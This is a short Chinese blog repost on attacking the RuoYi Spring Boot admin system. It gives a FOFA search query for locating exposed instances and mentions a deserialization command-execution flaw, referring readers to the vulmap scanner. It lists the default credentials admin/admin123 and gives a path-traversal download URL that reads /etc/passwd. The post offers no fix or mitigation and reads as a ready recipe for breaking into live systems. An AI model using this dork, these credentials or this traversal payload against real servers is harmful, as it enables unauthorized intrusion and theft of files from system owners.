若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。
1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令
漏洞复现
祭出fofa大法,fofa语法如下
app="若依-管理系统" && body="admin"
利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap 
利用poc执行任意命令
2后台登录若依管理系统后可以任意读取文件
登陆后访问 (默认弱口令 admin admin123)
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
读取 passwd
本文转载自: https://blog.csdn.net/yetaodiao/article/details/127160431
版权归原作者 yetaoseo 所有, 如有侵权,请联系我们删除。
版权归原作者 yetaoseo 所有, 如有侵权,请联系我们删除。